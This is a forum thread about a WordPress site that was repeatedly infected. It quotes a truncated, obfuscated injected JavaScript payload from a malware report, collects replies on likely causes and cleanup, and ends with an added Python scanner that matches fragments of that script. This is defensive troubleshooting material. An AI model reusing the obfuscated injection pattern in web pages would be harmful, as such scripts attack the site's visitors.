  1. #1
    Web Enthusiast
    Join Date
    Jul 2000
    Location
    Western Massachusetts, USA
    Posts
    1,389

    Malware on WordPress site

    Twice now within one month Google Webmaster Tools has reported malware on my client's site www.beverlyhaberman.com. The first time I completely removed and re-loaded all the files. This time I'd like to get to the root cause of the malware.

    1) What is the source of this infection?
    2) How can I prevent this from happening again?
    3) Is there some way I can get rid of the infection short of removing and re-installing the files again?

    Here are the malware details according to Google Webmaster Tools.

    Last checked: April 5, 2012

    Suspected injected code at
    URL: http://beverlyhaberman.com/

    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Suspected injected code at
    URL: http://beverlyhaberman.com/workplace-productivity/


    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Suspected injected code at
    URL: http://beverlyhaberman.com/workplace-productivity/the-energy-of-yes

    Code:
    <script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
    )===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
    -31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
    ......
    Last edited by Mittineague; Apr 6, 2012 at 12:48. Reason: less mal code
    Paul C.
    ClickBasics
    http://www.clickbasics.com

  2. #2
    Community Advisor

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,551
    Could be any number of reasons, most of which have been discussed in depth here before (try a search for 'hacked', 'virus' or similar):

    - out-of-date WordPress install
    - out-of-date plugin
    - insecure plugin
    - using a free template downloaded from a secondary source
    - file permissions set insecurely
    - FTP hijacked by virus
    - insecure shared hosting

    As to which one it is, this is a process of elimination. If you're on shared hosting you're less likely to get to the bottom of it, as you probably won't have access to the logs necessary to examine what's happened in detail.

  3. #3
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    140
    Check out this WordPress article on SitePoint:
    http://www.sitepoint.com/10-wordpress-security-tips/

    Plus, check into your WordPress hosting company. Lots of hosting companies allow WordPress to be installed, but have you are responsible for ....

  4. #4
    SitePoint Member
    Join Date
    Apr 2012
    Location
    Memphis, TN
    Posts
    2

    The iframe and malware are really beside the point

    Something is putting that line of code at the top of your pages - probably the index.php file(s). But more important - that "something" will keep putting the hack code back unless you do a complete clearing out as recommended in the referenced articles.

    Instead of trying to locate the source of the recurrence, just wipe the site, re-install WordPress + plugins and harden the site as mentioned.

    Cheers,
    Let me know how it goes.

  5. #5
    Web Enthusiast
    Join Date
    Jul 2000
    Location
    Western Massachusetts, USA
    Posts
    1,389
    When you say completely wipe out the site, do you mean the database as well, or just the files?
    Paul C.
    ClickBasics
    http://www.clickbasics.com

  6. #6
    Programming Team
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,173
    Don't just wipe it - save a backup of your database or you'll lose your posts and comments.

    Then virus scan it. And if you can't get new plugins and the theme you're using, scan those too.

    Scan your own machine, change passwords, install a fresh most recent version of WordPress etc. etc. The codex has a good page "Hardening WordPress" if I remember correctly.

  7. #7
    SitePoint Member
    Join Date
    Apr 2012
    Posts
    3
    Always keep backup data. The other thing is to remove this injected code from all PHP files. I guess the PHP files have this script injection. The main thing is a secure password. Change your passwords frequently and have a strong one.
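
A read-only scan for the injected script that posts #4 and #7 refer to, added here as an example and not written by anyone in the thread: it walks a site's files, flags those containing literal fragments of the script quoted in post #1, and lists them oldest-modified first so the earliest hit can be compared against FTP and access logs. The function names, the extension list and the sample tree are assumptions made for the illustration.

```python
import os
import tempfile
from pathlib import Path

# Literal fragments copied from the injected <script> quoted in post #1.
SIGNATURES = ('new String("asd").prototype.q', "catch(egewgsd)")
# File types to inspect: an assumption, the thread only guesses at PHP files.
EXTENSIONS = {".php", ".js", ".html", ".htm"}

def _squash(text):
    """Drop all whitespace so a re-wrapped copy of the script still matches."""
    return "".join(text.split())

def scan_tree(root, signatures=SIGNATURES, extensions=EXTENSIONS):
    """Return [(mtime, path, matched_signatures)], oldest modification first."""
    needles = [(sig, _squash(sig)) for sig in signatures]
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        try:
            body = _squash(path.read_text(encoding="utf-8", errors="replace"))
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        hits = [sig for sig, squashed in needles if squashed in body]
        if hits:
            findings.append((path.stat().st_mtime, str(path), hits))
    return sorted(findings)

def build_sample_site():
    """Constructed sample tree (not from the thread): two infected files, one clean."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    injected = ('<script>try{new String("asd")\n.prototype.q}'
                "catch(egewgsd){/* payload elided */}</script>\n")
    files = {  # relative path -> (content, modification time to set)
        "index.php": (injected + "<?php // front controller\n", 2000),
        "wp-content/themes/demo/header.php": (injected + "<?php // theme\n", 1000),
        "wp-config.php": ("<?php // clean file\n", 3000),
    }
    for rel, (body, mtime) in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
        os.utime(path, (mtime, mtime))
    return root

if __name__ == "__main__":
    for mtime, path, hits in scan_tree(build_sample_site()):
        print(int(mtime), path, hits)
```

To check a real site, call `scan_tree()` on a downloaded copy of its files. An empty result does not establish that the site is clean, because the same script can also be emitted from the database or from encoded PHP that contains none of these literal fragments.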

